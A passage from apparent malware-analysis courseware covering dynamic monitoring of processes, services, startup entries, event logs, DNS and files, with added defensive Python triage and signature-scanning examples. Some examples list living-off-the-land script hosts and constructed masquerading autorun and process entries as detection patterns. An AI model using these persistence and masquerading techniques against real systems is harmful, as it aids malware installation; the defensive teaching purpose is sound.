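    {"pid": 612, "name": "svchost.exe", "image": r"C:\Windows\System32\svchost.exe"},
    {"pid": 3120, "name": "svch0st.exe", "image": r"C:\Users\lab\AppData\Local\Temp\svch0st.exe"},
    {"pid": 3188, "name": "explorer.exe", "image": r"C:\Users\Public\explorer.exe"},
]
SERVICES = [  # constructed inventory
    {"name": "Spooler", "binary": r"C:\Windows\System32\spoolsv.exe", "account": "LocalSystem"},
    {"name": "Spoolerr", "binary": r"C:\Users\lab\AppData\Roaming\spoolsv.exe", "account": "LocalSystem"},
]

if __name__ == "__main__":
    for line in review_processes(PROCESSES) + review_services(SERVICES):
        print(line)
```

ntpath is used instead of os.path so the Windows paths split correctly even when the review runs on a non-Windows analysis host.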

Figure 7.79: Screenshot of Windows Service Manager
Some additional Windows service monitoring tools are as follows:
▪ Advanced Windows Service Manager (https://securityxploded.com)
▪ Process Hacker (https://processhacker.sourceforge.io)
▪ Netwrix Service Monitor (https://www.netwrix.com)
▪ AnVir Task Manager (https://www.anvir.com)
▪ Services (https://www.activeplus.com)
Dynamic Malware Analysis: Startup Programs Monitoring
Startup Programs Monitoring

Malware can alter the system settings and add itself to the startup menu to perform malicious activities whenever the system starts. Therefore, scanning for suspicious startup programs manually or using startup program monitoring tools such as Autoruns for Windows is essential for detecting malware.

Steps to manually detect hidden malware:
▪ Step 1: Check startup program entries in the registry
Startup items such as programs, shortcuts, folders, and drivers are set to run automatically at startup when users log in to a Windows OS (e.g., Windows 10). Startup items can be added by the programs or drivers installed, or manually by the user. Programs that run on Windows 10 startup can be located in these registry entries, such as Windows startup setting, Explorer startup setting, and IE startup setting.
o Windows Startup Setting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
o Explorer Startup Setting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, Common Startup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Common Startup
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, Startup
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Startup
o IE Startup Setting
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\MenuExt
▪ Step 2: Check device drivers automatically loaded
Navigate to C:\Windows\system32\drivers to check the device drivers.

Figure 7.80: Screenshot displaying drivers folder

▪ Step 3: Check boot.ini or bcd (bootmgr) entries
Check boot.ini or bcd (bootmgr) entries using the command prompt. Open command prompt with administrative privileges, type bcdedit, and press Enter to view all the boot manager entries.

Figure 7.81: Screenshot displaying boot info

▪ Step 4: Check Windows services that start automatically
Go to Run > Type services.msc and press Enter. Sort the services by Startup Type to check the Windows services list for services that automatically start when the system boots.
Figure 7.82: Screenshot displaying services

▪ Step 5: Check the Startup folder
Startup folders store applications or shortcuts to applications that auto-start when the system boots. To check the Startup applications, search the following locations in Windows 10:
o C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
o C:\Users\(User-Name)\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Another method to access startup folders is as follows:
1. Press Windows + R simultaneously to open the Run box
2. Type shell:startup in the box and click OK to navigate to the startup folder

Figure 7.83: Screenshot showing shell:startup command in the Run box

Startup Program Monitoring Tool: Autoruns for Windows
Source: https://docs.microsoft.com
This utility covers the auto-start locations checked by any startup monitor, displays what programs are configured to run during system bootup or login, and shows the entries in the order that Windows processes them. Beyond the startup folder, Run, RunOnce, and other registry keys, users can configure Autoruns to show other locations, including explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, and auto-start services. Autoruns' Hide Signed Microsoft Entries option helps the user to zoom in on third-party auto-start images that are added to the user's system, and it provides support for checking the auto-start images configured for other accounts on the system.
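The registry Run keys from the Registry Monitoring topic and the locations enumerated in Steps 1 and 5 above produce a list of auto-start entries; the remaining work is deciding which of them deserve a closer look. The added example below is not part of the courseware and not Autoruns' logic: it takes constructed entries in the form (location, value name, command line) and applies three heuristics a defender commonly uses: a command that references a user-writable path, a value that launches through a script host such as rundll32 rather than its own image, and a value name that imitates a Windows component while its image lies outside the system folders. The function names `image_from_command` and `triage_autoruns` and the `SCRIPT_HOSTS` and `USER_WRITABLE` lists are assumptions made for the example.

```python
"""Triage of auto-start entries collected from Run keys and Startup folders (added example; constructed data)."""
import ntpath

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")
# Assumption: hosts that commonly wrap a payload so the Run value does not point at it directly.
SCRIPT_HOSTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "powershell.exe", "cmd.exe"}
SYSTEM_FOLDERS = ("\\windows\\", "\\program files")


def image_from_command(command):
    """First token of a Windows command line, honouring a quoted path that contains spaces."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def triage_autoruns(entries):
    """entries: [{"location", "name", "command"}]; returns the entries worth a closer look and why."""
    findings = []
    for e in entries:
        cmd = e["command"].lower()
        image = image_from_command(cmd)
        reasons = []
        if any(tag in cmd for tag in USER_WRITABLE):
            reasons.append("references a user-writable path")
        if ntpath.basename(image) in SCRIPT_HOSTS:
            reasons.append("runs through a script/LOLBin host rather than its own image")
        if (any(w in e["name"].lower() for w in ("windows", "microsoft", "security"))
                and not any(f in image for f in SYSTEM_FOLDERS)):
            reasons.append("name imitates a Windows component but image is outside system folders")
        if reasons:
            findings.append({"location": e["location"], "name": e["name"], "reasons": reasons})
    return findings


HKCU_RUN = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
HKLM_RUN = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
STARTUP_DIR = r"C:\Users\lab\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

ENTRIES = [  # constructed; the first three are Run values, the last is a Startup-folder shortcut target
    {"location": HKCU_RUN, "name": "OneDrive",
     "command": r'"C:\Users\lab\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"location": HKLM_RUN, "name": "SecurityHealth",
     "command": r"C:\Windows\System32\SecurityHealthSystray.exe"},
    {"location": HKCU_RUN, "name": "Windows Update Helper",
     "command": r"rundll32.exe C:\Users\lab\AppData\Roaming\upd.dll,Start"},
    {"location": STARTUP_DIR, "name": "report.lnk", "command": r"C:\Users\Public\report.exe"},
]

if __name__ == "__main__":
    for f in triage_autoruns(ENTRIES):
        print(f["name"], "->", "; ".join(f["reasons"]))
```

The OneDrive hit shows the limit of path heuristics: legitimate per-user software also lives under AppData, so a single weak reason is a prompt to check the signer, which is exactly what Autoruns' Hide Signed Microsoft Entries option does for you. An entry collecting all three reasons, like the constructed "Windows Update Helper" value, is what the manual steps above are meant to surface.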

Figure 7.84: Screenshot of Autoruns for Windows
Some additional startup programs monitoring tools are as follows:
▪ WinPatrol (http://www.winpatrol.com)
▪ Autorun Organizer (https://www.chemtable.com)
▪ Quick Startup (https://www.glarysoft.com)
▪ StartEd Pro (http://www.outertech.com)
▪ Chameleon Startup Manager (http://www.chameleon-managers.com)
Dynamic Malware Analysis: Event Logs Monitoring/Analysis
Event Logs Monitoring/Analysis

Log analysis is a process that provides the details of an activity or event that can extract information and helps in identifying possible attacks in the form of Trojans, worms, backdoor Trojans, or any possible security gaps. It serves as a primary source of possible attacks (failed authentication/login attempts) in the system. This process helps in detecting zero-day attacks when logs are analyzed for different components. Log monitoring can be performed for components that perform security operations, such as firewall systems, IDS/IPS, web servers, and authentication servers. The logs also contain file types, ports, timestamps, and registry entries. In Windows, system logs, application logs, access logs, audit logs, and security logs can be analyzed in Event Viewer under the section "Windows Logs."

Logs are located via the following paths:
▪ System logs
Start > Windows Administrative Tools > Event Viewer > Windows Logs > System
▪ Security logs
Start > Windows Administrative Tools > Event Viewer > Windows Logs > Security
▪ Applications and Services Logs
Start > Windows Administrative Tools > Event Viewer > Applications and Services Logs
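The failed authentication attempts named above are the most common thing pulled out of the Security log. The added example below is not part of the courseware and not Splunk or Event Viewer logic: it runs two detections over constructed Security log records of the shape a SIEM export would provide (Windows event ID 4625 is a failed logon, 4624 a successful one): a sliding-window count of failures per source address, and a success that follows a run of failures for the same account from the same address. The record layout, the thresholds, the function names `failed_logon_bursts` and `success_after_failures`, and the addresses and account names are all assumptions made for the example.

```python
"""Detect failed-logon bursts and success-after-failures in Security log events (added example; constructed)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records in the shape a SIEM export of Event Viewer's Security log would give:
# 4625 = failed logon, 4624 = successful logon.
EVENTS = (
    [{"id": 4625, "time": f"2024-03-01T09:00:{1 + 6 * i:02d}", "user": "admin",
      "ip": "198.51.100.7", "logon_type": 3} for i in range(6)]
    + [{"id": 4624, "time": "2024-03-01T09:00:40", "user": "admin", "ip": "198.51.100.7", "logon_type": 3},
       {"id": 4625, "time": "2024-03-01T10:15:00", "user": "alice", "ip": "192.168.56.20", "logon_type": 2},
       {"id": 4624, "time": "2024-03-01T10:15:20", "user": "alice", "ip": "192.168.56.20", "logon_type": 2},
       {"id": 4625, "time": "2024-03-01T11:00:00", "user": "bob", "ip": "203.0.113.10", "logon_type": 3},
       {"id": 4625, "time": "2024-03-01T11:30:00", "user": "bob", "ip": "203.0.113.10", "logon_type": 3}]
)


def failed_logon_bursts(events, threshold=5, window=timedelta(minutes=5)):
    """Largest number of 4625 events from one source inside any `window`; alert when >= threshold.
    Returns (ip, count, first_time, last_time) per source that crosses the threshold."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        if e["id"] == 4625:
            by_ip[e["ip"]].append(datetime.fromisoformat(e["time"]))
    bursts = []
    for ip, times in by_ip.items():
        best, start = (0, None, None), 0
        for end, t in enumerate(times):
            while t - times[start] > window:          # slide the window's left edge forward
                start += 1
            if end - start + 1 > best[0]:
                best = (end - start + 1, times[start], t)
        if best[0] >= threshold:
            bursts.append((ip, best[0], best[1].isoformat(), best[2].isoformat()))
    return bursts


def success_after_failures(events, min_failures=3, window=timedelta(minutes=10)):
    """A 4624 preceded by at least `min_failures` 4625 for the same account and source
    within `window`: the pattern of a guessed password. Returns (ip, user, failures, time)."""
    failures = [e for e in events if e["id"] == 4625]
    hits = []
    for s in events:
        if s["id"] != 4624:
            continue
        t = datetime.fromisoformat(s["time"])
        prior = [f for f in failures if f["ip"] == s["ip"] and f["user"] == s["user"]
                 and timedelta(0) <= t - datetime.fromisoformat(f["time"]) <= window]
        if len(prior) >= min_failures:
            hits.append((s["ip"], s["user"], len(prior), s["time"]))
    return hits


if __name__ == "__main__":
    print("bursts:", failed_logon_bursts(EVENTS))
    print("success after failures:", success_after_failures(EVENTS))
```

A single mistyped password (the constructed "alice" records) crosses neither threshold, which is the point of requiring a run of failures rather than alerting on every 4625.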

Log Analysis Tools:
▪ Splunk
Source: https://www.splunk.com
It is an SIEM tool that can automatically collect all the event logs from all the systems present in the network. Splunk forwarders need to be installed in all the systems in the network that need to be monitored, and these forwarders will transfer the real-time event logs from the network systems to the main Splunk dashboard.

Figure 7.85: Screenshot of Splunk
Some additional log monitoring/analysis tools are as follows:
▪ ManageEngine EventLog Analyzer (https://www.manageengine.com)
▪ Logaly (https://www.logaly.com)
▪ SolarWinds Log & Event Manager (https://www.solarwinds.com)
▪ Netwrix Event Log Manager (https://www.netwrix.com)
Dynamic Malware Analysis: Installation Monitoring
Installation Monitoring

When the system or user installs or uninstalls any software application, traces of the application data might remain on the system. To find these traces, you should know the folders modified or created during the installation process as well as the files and folders that have not been modified by the uninstall process. Installation monitoring helps in detecting hidden and background installations performed by malware. Tools such as SysAnalyzer can be used to monitor the installation of malicious executables.

▪ Mirekusoft Install Monitor
Source: https://www.mirekusoft.com
Mirekusoft Install Monitor automatically monitors what is placed on your system and allows you to uninstall it completely. It works by monitoring resources (such as file and registry) that are created when a program is installed. It provides detailed information about the software installed. Furthermore, it helps you to determine the disk, CPU, and memory consumption of your programs. It also provides information about how often you use different programs. A program tree is a useful tool that can show you which programs were installed together.

Figure 7.86: Screenshot of Mirekusoft Install Monitor
Some additional installation monitoring tools are as follows:
▪ SysAnalyzer (https://www.aldeid.com)
▪ Advanced Uninstaller PRO (https://www.advanceduninstaller.com)
▪ REVO UNINSTALLER PRO (https://www.revouninstaller.com)
▪ Comodo Programs Manager (https://www.comodo.com)
Malware Analysis: Dynamic Files and Folders Monitoring

Files and Folders Monitoring
Malware can modify the system files and folders to save some information in them. You should be able to find the files and folders that the malware creates and analyze them to collect any relevant stored information. These files and folders may also contain hidden program code or malicious strings that the malware would schedule for execution according to a specified schedule.
Scan for suspicious files and folders using tools such as PA File Sight, Tripwire, and Netwrix Auditor, to detect any Trojans installed as well as system file modifications.

▪ PA File Sight
Source: https://www.poweradmin.com
PA File Sight is a file protection and auditing tool. It detects ransomware attacks coming from the network and stops them.
Features:
o Compromised computers are blocked from reaching files on other protected servers on the network
o Detects users copying files and optionally blocks access
o Real-time alerts allow appropriate staff to investigate immediately
o Monitors who is deleting, moving, or reading files

Figure 7.87: Screenshot of PA File Sight

Some additional file integrity checking tools are as follows:
▪ Tripwire File Integrity and Change Manager (https://www.tripwire.com)
▪ Netwrix Auditor (https://www.netwrix.com)
▪ Verisys (https://www.ionx.co.uk)
▪ CSP File Integrity Checker (https://www.cspsecurity.com)
▪ NNT Change Tracker (https://www.newnettechnologies.com)
Malware Analysis: Dynamic Device Drivers Monitoring

Device Drivers Monitoring
Malware is installed on the system along with the device drivers when the user downloads infected drivers from untrusted sources. The malware uses these drivers to avoid detection. One can scan for suspicious device drivers using tools such as DriverView and Driver Detective, to verify whether they are genuine and whether they have been downloaded from the publisher's original site.
The path to the location of Windows system drivers is as follows:
Go to Run > Type msinfo32 > Software Environment > System Drivers

Figure 7.88: Screenshot displaying Windows System Drivers

▪ DriverView
Source: https://www.nirsoft.net
The DriverView utility displays the list of all device drivers currently loaded in the system. For each driver in the list, additional information is displayed, such as the load address of the driver, description, version, product name, and maker.
Features:
o Displays the list of all loaded drivers in your system
o Standalone executable

Figure 7.89: Screenshot of DriverView

Some additional device driver monitoring tools are as follows:
▪ Driver Booster (https://www.iobit.com)
▪ Driver Reviver (https://www.reviversoft.com)
▪ Driver Easy (https://www.drivereasy.com)
▪ Driver Fusion (https://treexy.com)
▪ Driver Genius (http://www.driver-soft.com)
Malware Analysis: Dynamic Network Traffic Monitoring/Analysis

Network Traffic Monitoring/Analysis
Network analysis is the process of capturing network traffic and investigating it carefully to identify malware activity. It helps to determine the type of traffic/network packets or data transmitted across the network.
Malware depends on the network for various activities such as propagation, downloading malicious content, transmitting sensitive files and information, and offering remote control to attackers. Therefore, you should adopt techniques that can detect malware artifacts and usage across networks. Some malware connects back to the handlers and sends confidential information to them.
In dynamic analysis, you run a piece of malware in a controlled environment that is installed with various network monitoring tools to trace all the networking activities of the malware. Network monitoring tools such as SolarWinds NetFlow Traffic Analyzer, Capsa Network Analyzer, and Wireshark can be used to monitor and capture live network traffic to and from the victim's system during execution of the suspicious program. This will help to understand the malware's network artifacts, signatures, functions, and other elements.

▪ SolarWinds NetFlow Traffic Analyzer
Source: https://www.solarwinds.com
NetFlow Traffic Analyzer collects traffic data, converts it into a useable format, and presents it to the user in a web-based interface for monitoring network traffic.
Features:
o Network traffic analysis
o Bandwidth monitoring
o Application traffic alerting
o Performance analysis
o CBQoS policy optimization
o Malicious or malformed traffic flow identification

Figure 7.90: Screenshot of SolarWinds NetFlow Traffic Analyzer

Some additional network activity monitoring tools are as follows:
▪ Capsa Network Analyzer (https://www.colasoft.com)
▪ Wireshark (https://www.wireshark.org)
▪ PRTG Network Monitor (https://kb.paessler.com)
▪ GFI LanGuard (https://www.gfi.com)
▪ NetFort LANGuardian (https://www.netfort.com)
Malware Analysis: Dynamic DNS Monitoring/Resolution

DNS Monitoring/Resolution
Malicious software such as DNSChanger can change the system's DNS server settings, thus providing attackers with control of the DNS server used in the victim's system. Subsequently, the attackers can control the sites to which the user tries to connect through the Internet, make him/her connect to a fraudulent website, or interfere with his/her online web browsing. Therefore, you should determine whether the malware is capable of changing any DNS server settings while performing dynamic analysis. You can use tools such as DNSQuerySniffer and DNSstuff to identify the DNS servers that the malware tries to connect to and to verify the type of connection.

▪ DNSQuerySniffer
Source: https://www.nirsoft.net
DNSQuerySniffer is a network sniffer utility that shows the DNS queries sent on your system. For every DNS query, the following information is displayed: host name, port number, query ID, request type (A, AAAA, NS, MX, and so on), request time, response time, duration, response code, number of records, and content of the returned DNS records. You can easily export the DNS query information to a CSV/tab-delimited/XML/HTML file or copy the DNS queries to the clipboard and then paste them into Excel or other spreadsheet applications.

Figure 7.91: Screenshot of DNSQuerySniffer

Some additional DNS monitoring/resolution tools are as follows:
▪ DNSstuff (https://www.dnsstuff.com)
▪ DNS Lookup Tool (https://www.ultratools.com)
▪ Sonar Lite (https://constellix.com)
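The text above describes the per-query fields that DNSQuerySniffer can export (host name, request type, response code, returned records, and so on) but not what an analyst does with such an export once the suspicious program has run. The following is an added example, not code from the courseware or from NirSoft: it parses a CSV export in that shape and flags names that fall outside an allowlist, repeatedly fail to resolve (the pattern left by domain-generation or sinkholed C&C names), or are looked up as MX records from an endpoint. The column headings, the rows, the allowlist and the thresholds are constructed for the illustration; only the two Microsoft host names also appear in the page's screenshot.

```python
"""Triage of a DNSQuerySniffer-style DNS query export (added example)."""
import csv
import io
from collections import defaultdict

# Constructed export. Column names mirror the per-query fields listed in the text.
SAMPLE_EXPORT = """\
Host Name,Port,Query ID,Request Type,Request Time,Response Time,Duration,Response Code,Records Count,Records
login.microsoftonline.com,53,0x1A2B,A,2019-03-21 10:02:11,2019-03-21 10:02:11,12 ms,Success,2,"203.0.113.1, 203.0.113.2"
go.microsoft.com,53,0x1A2C,A,2019-03-21 10:02:12,2019-03-21 10:02:12,9 ms,Success,1,203.0.113.3
qwx7tz-updates.example,53,0x1A2E,A,2019-03-21 10:02:20,2019-03-21 10:02:20,30 ms,Name Error,0,
qwx7tz-updates.example,53,0x1A2F,A,2019-03-21 10:02:21,2019-03-21 10:02:21,31 ms,Name Error,0,
qwx7tz-updates.example,53,0x1A30,AAAA,2019-03-21 10:02:22,2019-03-21 10:02:22,29 ms,Name Error,0,
mx1.invoice-payments.example,53,0x1A31,MX,2019-03-21 10:02:25,2019-03-21 10:02:25,40 ms,Success,1,mail.invoice-payments.example
"""

# Constructed allowlist: infrastructure the analysis VM is expected to talk to.
KNOWN_GOOD_SUFFIXES = ("microsoftonline.com", "microsoft.com")


def parse_export(text):
    """Parse the CSV export into one dict per DNS query."""
    return list(csv.DictReader(io.StringIO(text)))


def summarize(rows):
    """Aggregate per queried host: query count, failed lookups, record types, answers."""
    stats = defaultdict(lambda: {"queries": 0, "nxdomain": 0, "types": set(), "answers": set()})
    for row in rows:
        host = stats[row["Host Name"].strip().lower()]
        host["queries"] += 1
        host["types"].add(row["Request Type"])
        if row["Response Code"] != "Success":
            host["nxdomain"] += 1
        for answer in row["Records"].split(","):
            if answer.strip():
                host["answers"].add(answer.strip())
    return stats


def _allowlisted(host, suffixes):
    return any(host == s or host.endswith("." + s) for s in suffixes)


def triage(rows, known_good=KNOWN_GOOD_SUFFIXES, nxdomain_threshold=2):
    """Return (host, reason) pairs for names worth a closer look, sorted by host."""
    findings = []
    for host, s in sorted(summarize(rows).items()):
        if _allowlisted(host, known_good):
            continue
        reasons = []
        if s["nxdomain"] >= nxdomain_threshold:
            reasons.append(f"{s['nxdomain']} failed lookups (possible DGA or sinkholed C&C name)")
        if "MX" in s["types"]:
            reasons.append("MX lookup from an endpoint (possible spam-sending module)")
        if not reasons:
            reasons.append("not in the allowlist of expected names")
        findings.append((host, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for host, reason in triage(parse_export(SAMPLE_EXPORT)):
        print(f"{host}: {reason}")
```

Run against a real export, the allowlist should be the names seen during a clean baseline run of the same VM, so that everything left over is attributable to the sample under test.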
Malware Analysis: Dynamic API Calls Monitoring

API Calls Monitoring
Application programming interfaces (APIs) are parts of the Windows OS that allow external applications to access OS information such as file systems, threads, kernel, errors, registry, buttons, mouse pointer, web, network services, and the Internet. Malware programs also use these APIs to access the OS information and cause damage to the system.
You need to gather the APIs related to the malware programs and analyze them to reveal their interaction with the OS as well as the activities they have been performing over the system. Use API call monitoring tools such as API Monitor to monitor API calls made by applications.

▪ API Monitor
Source: https://www.apimonitor.com
API Monitor is a software that allows you to monitor and display Win32 API calls made by applications. It can trace any exported API and it displays a wide range of information, including function name, call sequence, input and output parameters, function return value, etc. It is a useful developer tool for understanding how Win32 applications work and for learning their tricks.

Figure 7.92: Screenshot of API Monitor

Some additional API monitoring tools are as follows:
▪ APImetrics (https://apimetrics.io)
▪ Runscope (https://www.runscope.com)
▪ AlertSite (https://smartbear.com)
Virus Detection Methods

The rule of thumb for virus and worm detection is that if an email seems suspicious (i.e., if the user is not expecting an e-mail from the sender and does not know the sender), or if the email header contains something that a known sender would not usually say, the user must be careful about opening the email, as there might be a risk of virus infection. The MyDoom and W32.Novarg.A@mm worms have infected the systems of many Internet users, mostly through e-mail.
The best methods for virus detection are as follows:
▪ Scanning
▪ Integrity checking
▪ Interception
▪ Code Emulation
▪ Heuristic Analysis
Furthermore, a combination of these techniques can be more effective.

▪ Scanning
A virus scanner is an essential software for detecting viruses. In the absence of a scanner, it is highly likely that the system will be attacked by a virus. Run antivirus tools continuously and update the scan engine and virus signature database on a regular basis. Antivirus software is of no use if it does not know what to look for. The scanning for virus detection is performed in the following ways:
o Once a virus is detected in the wild, antivirus vendors across the globe identify its signature strings (characteristics).
o The vendors start writing scanning programs that look for the virus's signature strings.
o The resulting new scanners search memory, files, and system sectors for the signature strings of the new virus.
o The scanner declares the presence of the virus once it finds a match. Only known and predefined viruses can be detected.
Some critical aspects of virus scanning are as follows:
o Virus writers often create many new viruses by altering existing ones. It may take only a short time to create a virus that appears new but which is actually just a modification of an existing virus. Attackers make these changes frequently to confuse scanners.
o In addition, to enhance signature recognition, new scanners use detection techniques such as code analysis. Before investigating the code characteristics of a virus, the scanner examines the code at various locations in an executable file.
o Some scanners set up a virtual computer in a machine's RAM and test the programs by executing them in this virtual space. This technique, called heuristic scanning, can also check and remove messages that might contain a computer virus or other unwanted content.
Advantages of scanners
o They can check programs before execution.
o They are the easiest way to check new software for known or malicious viruses.
Drawbacks of scanners
o Old scanners may be unreliable. With the rapid increase in new viruses, old scanners can quickly become obsolete. It is best to use the latest scanners available in the market.
o Because viruses are developed more rapidly compared to scanners for combating them, even new scanners are not equipped to handle every new challenge.
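The scanning method above rests on two facts stated in the text: a scanner can only match predefined signature strings, and a virus writer can defeat an exact string by making a small modification to an existing virus. The following added example (not code from the courseware and not a real antivirus engine) makes both concrete: it compiles hex signature strings into byte patterns, supports a "??" wildcard for the bytes that vary between variants, and scans a buffer or a file. The signature names, the two byte sequences (an original and a "new" variant that only changed the pushed address) and the "AutoOpen" macro string are all constructed for the illustration.

```python
"""Signature-string scanning with wildcard support (added example)."""
import re

# An exact signature as a vendor might first write it: push 0 / push <addr> / call.
EXACT_SIGNATURES = {"Demo.Dropper.A": "6A 00 68 10 20 40 00 E8"}

# The same signature with the address bytes that vary per variant masked by ??.
WILDCARD_SIGNATURES = {
    "Demo.Dropper.A": "6A 00 68 ?? ?? 40 00 E8",
    "Demo.Macro.B": "41 75 74 6F 4F 70 65 6E",  # the ASCII bytes of "AutoOpen"
}


def compile_signature(signature):
    """Turn 'AA ?? BB' into a bytes regex in which ?? matches any single byte."""
    parts = []
    for token in signature.split():
        if token == "??":
            parts.append(b".")
        else:
            parts.append(re.escape(bytes([int(token, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


def scan_bytes(data, signatures):
    """Return the names of every signature whose pattern occurs in data."""
    return [name for name, sig in signatures.items() if compile_signature(sig).search(data)]


def scan_file(path, signatures):
    """Scan a file on disk; the same routine serves memory dumps or sector images."""
    with open(path, "rb") as fh:
        return scan_bytes(fh.read(), signatures)


# Constructed samples: the original and a variant that differs only in the pushed address.
ORIGINAL_SAMPLE = b"\x90\x90\x6a\x00\x68\x10\x20\x40\x00\xe8\x11\x22\x33\x44\xc3"
VARIANT_SAMPLE = b"\x90\x90\x6a\x00\x68\x30\x21\x40\x00\xe8\x11\x22\x33\x44\xc3"


def demo():
    """Show the exact signature missing the variant while the wildcard form catches it."""
    return {
        "exact_on_original": scan_bytes(ORIGINAL_SAMPLE, EXACT_SIGNATURES),
        "exact_on_variant": scan_bytes(VARIANT_SAMPLE, EXACT_SIGNATURES),
        "wildcard_on_variant": scan_bytes(VARIANT_SAMPLE, WILDCARD_SIGNATURES),
    }


if __name__ == "__main__":
    for label, hits in demo().items():
        print(f"{label}: {hits or 'no match'}")
```

The wildcard is the simplest form of the "code analysis" the text mentions; it buys resilience against address or constant changes but not against the re-encrypted bodies that code emulation and heuristics are meant to handle.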
▪ Integrity Checking
o Integrity checking products perform their functions by reading and recording integrated data to develop a signature or baseline for those files and system sectors.
o A disadvantage of a basic integrity checker is that it cannot differentiate file corruption caused by a bug from that caused by a virus.
o There are some advanced integrity checkers available for analyzing and identifying the types of changes made by viruses.
o Some integrity checkers combine antivirus techniques with integrity checking to create a hybrid tool. This simplifies the virus checking process.
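The integrity checking described here, the installation monitoring and the files and folders monitoring covered earlier in this module all rest on the same mechanism: record a baseline of the files on the system, let the suspicious program run, and report what was added, removed or modified. The following added example (not code from the courseware or from any of the tools named) implements that baseline-and-diff loop with SHA-256 hashes and a JSON baseline file. The directory layout, file contents and the "installer" that drops a DLL, rewrites a config file and deletes a file are all constructed inside a temporary directory so the example runs offline.

```python
"""Baseline-and-diff file integrity monitoring (added example)."""
import hashlib
import json
import os
import tempfile


def snapshot(root):
    """Return {relative_path: sha256_hex} for every regular file under root."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            state[rel] = digest.hexdigest()
    return state


def save_baseline(state, path):
    """Persist a snapshot so it can be compared against after the program runs."""
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(state, fh, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path, "r", encoding="utf-8") as fh:
        return json.load(fh)


def compare(before, after):
    """Classify paths as added, removed or modified between two snapshots."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in before.keys() & after.keys() if before[p] != after[p]),
    }


def _write(root, rel, data):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as fh:
        fh.write(data)


def demo():
    """Constructed scenario: baseline a tree, simulate an install, diff the result."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        _write(root, "app/readme.txt", b"original readme\n")
        _write(root, "system/config.ini", b"[net]\nproxy=0\n")
        baseline_path = os.path.join(store, "baseline.json")
        save_baseline(snapshot(root), baseline_path)
        # ... the suspicious program runs here; this is a constructed stand-in ...
        _write(root, "app/helper.dll", b"MZ\x90\x00constructed-stub")
        _write(root, "system/config.ini", b"[net]\nproxy=1\n")
        os.remove(os.path.join(root, "app", "readme.txt"))
        return compare(load_baseline(baseline_path), snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

As the text notes for basic integrity checkers, the diff says only that system/config.ini changed, not whether a bug, an update or malware changed it; that attribution is the analyst's job, which is why the baseline is taken on a clean VM immediately before the sample runs.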
▪ Interception
o The primary objective of an interceptor is to deflect logic bombs and Trojans. The interceptor controls requests to the OS for network access or actions that cause threats to programs. If it finds such a request, it pops up and asks if the user wants to allow the request to continue.
o There is no reliable way to intercept direct branches to low-level code or direct input/output instructions by the virus.
o Some viruses can disable the monitoring program itself.
▪ Code Emulation
Using code emulation, antivirus software executes a virtual machine to mimic CPU and memory activities. Here, virus code is executed on the virtual machine instead of the real processor. Code emulation efficiently deals with encrypted and polymorphic viruses. After the emulator is run for a long time, the decrypted virus body eventually presents itself to a scanner for detection. It also detects metamorphic viruses (single or multiple encryptions). A drawback of code emulation is that it is too slow if the decryption loop is very long.
▪ Heuristic Analysis
This method helps in detecting new or unknown viruses that are usually variants of an already existing virus family. Heuristic analysis can be static or dynamic. In static analysis, the antivirus tool analyzes the file format and code structure to determine if the code is viral. In dynamic analysis, the antivirus tool performs code emulation of the suspicious code to determine if the code is viral. The drawback of heuristic analysis is that it is prone to too many false positives (i.e., it tags benign code as viral); thus, a user might mistrust a positive test result and mistakenly assume a false alarm when a real attack occurs.
Trojan Analysis: Emotet

Trojan Analysis: Emotet
Source: https://www.fortinet.com
